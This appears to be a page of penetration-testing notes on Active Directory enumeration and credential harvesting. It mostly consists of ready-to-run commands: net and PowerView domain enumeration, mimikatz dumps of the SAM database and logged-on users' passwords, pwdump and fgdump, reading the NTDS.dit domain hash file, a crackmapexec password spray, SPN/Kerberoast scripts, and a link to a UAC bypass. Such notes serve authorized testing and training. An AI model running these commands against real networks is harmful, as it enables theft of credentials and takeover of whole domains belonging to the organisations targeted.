Enumeration

Users / Groups / Computers

Look for users with high-privs across the domain e.g. Domain Admins or Derivative Local Admins
Look for custom groups.

# get all users in the domain # are there any weird domains? 
cmd> net user /domain
cmd> net user [username] /domain

# get all groups in the domain
cmd> net group /domain
cmd> net group [groupname] /domain

# get all computers in domain
cmd> net view
cmd> net view /domain

# get resources/shares of specified computer
cmd> net view \\[computer_name] /domain

If you can't get all the domain members info, you might want to check the priv (whoami /priv)

Check the UAC is enabled (if you're not able to execute executables that you uploaded like mimikatz)

https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/

Plaintext? (low hanging fruit) > Passwordspray?

WinPeas may reveal plaintext pass.

Dumping creds if it's not launghed from a SYSTEM, we need to run

token::elevate after privilege::debuf

# dump NTLM hashes + plaintext creds
mimikatz > lsadump::sam              # dump contents of SAM db in current host
mimikatz > sekurlsa::logonpasswords  # dump creds of logged-on users

Other tools

cmd> pwdump.exe localhost
cmd> fgdump.exe localhost          # improved pwdump, shutdown firewalls 
cmd> type C:\Windows\NTDS\NTDS.dit # all domain hashes in NTDS.dit file on the Domain Controller

Are there any pattens in users passwords? Can we make a password list and do a password spray?

crackmapexec smb IP -u user.txt -p pass.txt --continue-on-success

Then try RDP

rdesktop -r disk:tmp=/home/kali/transfer -u domain_name\\user_name -p Password IP_+addr

by setting a disk argument, we can see and transfer all the files from the directory as a share. It's super useful.

SPN

Service Principal Names (AD Service Accounts)

A SPN is a unique name for a service on a host, used to associate with an Active Directory service account.
Enum SPNs to obtain the IP address and port number of apps running on servers integrated with Active Directory.
Query the Domain Controller in search of SPNs.
SPN Examples
- CIFS/MYCOMPUTER$ - file share access.
- LDAP/MYCOMPUTER$ - querying AD info via. LDAP.
- HTTP/MYCOMPUTER$ - Web services such as IIS.
- MSSQLSvc/MYCOMPUTER$ - MSSQL.
Perform nslookup of the service hostname -> see if there is an entrypoint here.
Automated SPN enum scripts:

# Kerberoast: https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1
PS> .\GetUserSPNs.ps1

# Powershell Empire: https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1
PS> .\Get-SPN.ps1

Logged-in users and active user sessions.

More powerview commands https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview

PS> Set-ExecutionPolicy Unrestricted
PS> Import-Module .\PowerView.ps1
PS> Get-NetLoggedon -ComputerName [computer_name]    # enum logged-in users
PS> Get-NetSession -ComputerName [domain_controller] # enum active user sessions

Domain Controller hostname (PdcRoleOwner)**

PS> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

PreviousActive Directory NextLateral movement

Last updated 2 years ago